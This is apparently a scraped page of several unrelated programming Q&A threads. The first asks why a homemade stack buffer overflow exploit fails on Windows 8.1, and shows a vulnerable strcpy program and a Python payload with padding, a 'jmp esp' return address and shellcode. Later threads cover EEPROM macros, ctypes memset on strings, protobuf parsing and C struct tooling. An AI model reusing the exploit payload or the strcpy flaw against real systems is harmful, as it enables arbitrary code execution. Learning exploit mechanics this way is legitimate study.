I try write my own exploit. The idea is simple - overwrite return address to place where is opcode 'jmp esp'. In esp is address of my shellcode.
So I have this simple program:
#include <stdio.h>
#include <string.h>
void do_something(char *Buffer)
{
char MyVar[100];
strcpy(MyVar,Buffer);
}
int main (int argc, char **argv)
{
do_something(argv[1]);
return 0;
}
My exploit have been written in python. Code: (I think that my shellcode not work, but it is not important now)
import os
import subprocess
out = '\x48' * 112
out = out + <address of 'jmp esp' opcode>
out = out + '\xcc\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x06\x8B\x68 \x08\xEB\x20\x5B\x53\x55\x5B\x81\xEB\x11\x11\x11\x11\x81\xC3\xDA\x3F\x1A\x11\xFF\xD3\x81\xC3\x11\x11\x11\x11\x81\xEB\x8C\xCC\x18\x11\xFF\xD3\xE8\xDB\xFF\xFF\xFF\x63\x6d\x64'
subprocess.call(['SimpleExploit.exe', out])
If address of 'jmp esp' opcode I have set for 0x41414141: (AAAA)
everything is ok (of course 0x41414141 is not good address, but I can see that memory has been overwritten)
My problem starts if I put correctly address. I found 0x7769E24D, so I used this value and after that in ollydbg I seen:
And this is my question: Why memory looks different? It looks like that one line has been removed. But why? Interesting thing is that If I change only one byte (0x77 to 0x41), memory is overwrite with correct value.
The second problem is that some of my bytes are transform to different values - for example 0x8b to 0x3f.
Could somebody tell me why this happen? Maybe this is a kind of protection? It is something with my operation system? I use Windows 8.1 x64.
Related
I'm trying to rewrite C code to python, but I'm not sure how to express this part in python
#include <EEPROM.h>
#define EEPROM_write(address, p) {int i = 0; byte *pp = (byte*)&(p);for(; i < sizeof(p); i++) EEPROM.write(address+i, pp[i]);}
I think I should use I2C object from machine, but I'm not sure what is going on in the C version
Let's dissect the macro line:
#define
This is the preprocessor command to define a macro.
EEPROM_write(address, p)
The macro is named "EEPROM_write" and it takes two arguments, "address" and "p". Since the preprocessor is mostly working here as a search-and-replace mechanism, there are no types. They depend on the site where the macro is used.
{
int i = 0;
byte *pp = (byte*)&(p);
for (; i < sizeof(p); i++)
EEPROM.write(address+i, pp[i]);
}
This is the formatted C code of the replacement. It consist of a single block of statements, and the preprocessor will replace each occurence of address and p with the arguments given at the usage of the macro.
The code block takes the address of p as a byte pointer. Then it loops through all bytes of p (including padding) and calls EEPROM.write() with consecutive addresses (starting at address) and the respective byte of p.
I have a unicode string f. I want to memset it to 0. print f should display null (\0)
I am using ctypes.memset to achieve this -
> >>> f
> u'abc'
> >>> print ("%s" % type(f))
> <type 'unicode'>
> >>> import ctypes
> **>>> ctypes.memset(id(f)+50,0,6)**
> **4363962530
> >>> f
> u'abc'
> >>> print f
> abc**
Why did the memory location not get memset in case of unicode string?
It works perfectly for an str object.
Thanks for help.
First, this is almost certainly a very bad idea. Python expects strings to be immutable. There's a reason that even the C API won't let you change their contents after they're flagged ready. If you're just doing this to play around with the interpreter's implementation, that can be fun and instructive, but if you're doing it for any real-life purpose, you're probably doing something wrong.
In particular, if you're doing it for "security", what you almost certainly really want to do is to not create a unicode in the first place, but instead create, say, a bytearray with the UTF-16 or UTF-32 encoding of your string, which can be zeroed out in a way that's safe, portable, and a lot easier.
Anyway, there's no reason to expect that two completely different types should store their buffers at the same offset.
In CPython 2.x, a str is a PyStringObject:
typedef struct {
PyObject_VAR_HEAD
long ob_shash;
int ob_sstate;
char ob_sval[1];
} PyStringObject;
That ob_sval is the buffer; the offset should be 36 on 64-bit builds and (I think) 24 on 32-bit builds.
In a comment, you say:
I read it somewhere and also the offset for a string type is 37 in my system which is what sys.getsizeof('') shows -> >>> sys.getsizeof('') 37
The offset for a string buffer is actually 36, not 37. And the fact that it's even that close is just a coincidence of the way str is implemented. (Hopefully you can understand why by looking at the struct definition—if not, you definitely shouldn't be writing code like this.) There's no reason to expect the same trick to work for some other type without looking at its implementation.
A unicode is a PyUnicodeObject:
typedef struct {
PyObject_HEAD
Py_ssize_t length; /* Length of raw Unicode data in buffer */
Py_UNICODE *str; /* Raw Unicode buffer */
long hash; /* Hash value; -1 if not set */
PyObject *defenc; /* (Default) Encoded version as Python
string, or NULL; this is used for
implementing the buffer protocol */
} PyUnicodeObject;
Its buffer is not even inside the object itself; that str member is a pointer to the buffer (which is not guaranteed to be right after the struct). Its offset should be 24 on 64-bit builds, and (I think) 20 on 32-bit builds. So, to do the equivalent, you'd need to read the pointer there, then follow it to find the location to memset.
If you're using a narrow-Unicode build, it should look like this:
>>> ctypes.POINTER(ctypes.c_uint16 * len(g)).from_address(id(g)+24).contents[:]
[97, 98, 99]
That's the ctypes translation of finding (uint16_t *)(((char *)g)+24) and reading the array that starts at *that and ends at *(that+len(g)), which is what you'd have to do if you were writing C code and didn't have access to the unicodeobject.h header.
(In the the test I just quoted, g is at 0x10a598090, while its src points to 0x10a3b09e0, so the buffer is not immediately after the struct, or anywhere near it; it's about 2MB before it.)
For a wide-Unicode build, the same thing with c_uint32.
So, that should show you what you want to memset.
And you should also see a serious implication for your attempt at "security" here. (If I have to point it out, that's yet another indication that you should not be writing this code.)
Hi I've a simple example of addressbook.proto I am serializing using the protobuf SerailizeToString() function in python. Here's the code.
import address_pb2
person = address_pb2.Person()
person.id = 1234
person.name = "John Doe"
person.email = "jdoe#example.com"
phone = person.phones.add()
phone.number = "555-4321"
phone.type = address_pb2.Person.HOME
print(person.SerializeToString())
Where address_pb2 is the file I generated from the protobuf compiler. Note that the example is copied from the protoBuf tutorials. This gives me the following string.
b'\n\x08John Doe\x10\xd2\t\x1a\x10jdoe#example.com"\x0c\n\x08555-4321\x10\x01'
Now I want to import this string into c++ protobuf. For this I wrote the following code.
#include <iostream>
#include <fstream>
#include <string>
#include "address.pb.h"
using namespace std;
int main(int argc, char* argv[]) {
GOOGLE_PROTOBUF_VERIFY_VERSION;
tutorial::AddressBook address_book;
string data = "\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""";
if(address_book.ParseFromString(data)){
cout<<"working"<< endl;
}
else{
cout<<"not working" << endl;
}
// Optional: Delete all global objects allocated by libprotobuf.
google::protobuf::ShutdownProtobufLibrary();
return 0;
}
Here I am simply trying to import the script using ParseFromString() fucntion but this doesn't work and I am not sure how it will work as I've been stuck on this since a long time now.
I tried changing the binary a bit to suit the c++ version but still no idea if I am on the right path or not.
How can I achieve this ? Does anybody have a clue ?
In Python, you are serializing a Person object. In C++, you are trying to parse an AddressBook object. You need to use the same type on both ends.
(Note that protobuf does NOT guarantee that it will detect these errors. Sometimes when you parse a message as the wrong type, the parse will appear to succeed, but the content will be garbage.)
There's another issue with your code that happens not to be a problem in this specific case, but wouldn't work in general:
string data = "\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""";
This line won't work if the string has any NUL bytes, i.e. '\x00'. If so, that byte would be interpreted as the end of the string. To avoid this problem you need to specify the length of the data, like:
string data("\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""", 45);
I am extending Python with some C++ code.
One of the functions I'm using has the following signature:
int PyArg_ParseTupleAndKeywords(PyObject *arg, PyObject *kwdict,
char *format, char **kwlist, ...);
(link: http://docs.python.org/release/1.5.2p2/ext/parseTupleAndKeywords.html)
The parameter of interest is kwlist. In the link above, examples on how to use this function are given. In the examples, kwlist looks like:
static char *kwlist[] = {"voltage", "state", "action", "type", NULL};
When I compile this using g++, I get the warning:
warning: deprecated conversion from string constant to ‘char*’
So, I can change the static char* to a static const char*. Unfortunately, I can't change the Python code. So with this change, I get a different compilation error (can't convert char** to const char**). Based on what I've read here, I can turn on compiler flags to ignore the warning or I can cast each of the constant strings in the definition of kwlist to char *. Currently, I'm doing the latter. What are other solutions?
Sorry if this question has been asked before. I'm new.
Does PyArg_ParseTupleAndKeywords() expect to modify the data you are passing in? Normally, in idiomatic C++, a const <something> * points to an object that the callee will only read from, whereas <something> * points to an object that the callee can write to.
If PyArg_ParseTupleAndKeywords() expects to be able to write to the char * you are passing in, you've got an entirely different problem over and above what you mention in your question.
Assuming that PyArg_ParseTupleAndKeywords does not want to modify its parameters, the idiomatically correct way of dealing with this problem would be to declare kwlist as const char *kwlist[] and use const_cast to remove its const-ness when calling PyArg_ParseTupleAndKeywords() which would make it look like this:
PyArg_ParseTupleAndKeywords(..., ..., ..., const_cast<char **>(kwlist), ...);
There is an accepted answer from seven years ago, but I'd like to add an alternative solution, since this topic seems to be still relevant.
If you don't like the const_cast solution, you can also create a write-able version of the string array.
char s_voltage[] = "voltage";
char s_state[] = "state";
char s_action[] = "action";
char s_type[] = "type";
char *kwlist[] = {s_voltage, s_state, s_action, s_type, NULL};
The char name[] = ".." copies the your string to a writable location.
I often have to write code in other languages that interact with C structs. Most typically this involves writing Python code with the struct or ctypes modules.
So I'll have a .h file full of struct definitions, and I have to manually read through them and duplicate those definitions in my Python code. This is time consuming and error-prone, and it's difficult to keep the two definitions in sync when they change frequently.
Is there some tool or library in any language (doesn't have to be C or Python) which can take a .h file and produce a structured list of its structs and their fields? I'd love to be able to write a script to generate my automatically generate my struct definitions in Python, and I don't want to have to process arbitrary C code to do it. Regular expressions would work great about 90% of the time and then cause endless headaches for the remaining 10%.
If you compile your C code with debugging (-g), pahole (git) can give you the exact structure layouts being used.
$ pahole /bin/dd
…
struct option {
const char * name; /* 0 8 */
int has_arg; /* 8 4 */
/* XXX 4 bytes hole, try to pack */
int * flag; /* 16 8 */
int val; /* 24 4 */
/* size: 32, cachelines: 1, members: 4 */
/* sum members: 24, holes: 1, sum holes: 4 */
/* padding: 4 */
/* last cacheline: 32 bytes */
};
…
This should be quite a lot nicer to parse than straight C.
Regular expressions would work great about 90% of the time and then cause endless headaches for the remaining 10%.
The headaches happen in the cases where the C code contains syntax that you didn't think of when writing your regular expressions. Then you go back and realise that C can't really be parsed by regular expressions, and life becomes not fun.
Try turning it around: define your own simple format, which allows less tricks than C does, and generate both the C header file and the Python interface code from your file:
define socketopts
int16 port
int32 ipv4address
int32 flags
Then you can easily write some Python to convert this to:
typedef struct {
short port;
int ipv4address;
int flags;
} socketopts;
and also to emit a Python class which uses struct to pack/unpack three values (possibly two of them big-endian and the other native-endian, up to you).
Have a look at Swig or SIP that would generate interface code for you or use ctypes.
Have you looked at Swig?
I have quite successfully used GCCXML on fairly large projects. You get an XML representation of the C code (including structures) which you can post-process with some simple Python.
ctypes-codegen or ctypeslib (same thing, I think) will generate ctypes Structure definitions (also other things, I believe, but I only tried structs) by parsing header files using GCCXML. It's no longer supported, but will likely work in some cases.
One my friend for this tasks done C-parser which he use with cog.